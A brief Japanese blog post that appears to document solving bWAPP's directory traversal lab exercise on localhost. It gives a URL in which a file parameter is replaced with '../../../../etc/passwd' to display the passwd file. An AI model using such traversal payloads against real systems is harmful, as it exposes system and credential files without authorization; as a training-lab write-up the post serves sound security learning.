shikata ga nai

Private? There is no such things.

bWAPPでA7-Directory Traversal-Files

Hello there,

 

A7 ⇨ Directory raversal - Filesを選択して。

 

f:id:ThisIsOne:20191227145411p:plain

 

URLの『message.txt』の箇所を以下のように変更すると。

下記のようにpasswdファイルの中身が表示された。

 http://localhost/directory_traversal_1.php?page=../../../../etc/passwd

 

f:id:ThisIsOne:20191227145316p:plain

 

Best regards,

ひとりひとりの自覚をもった行動で、医療従事者と保健所職員を助けよう。

f:id:ThisIsOne:20200404115457p:plain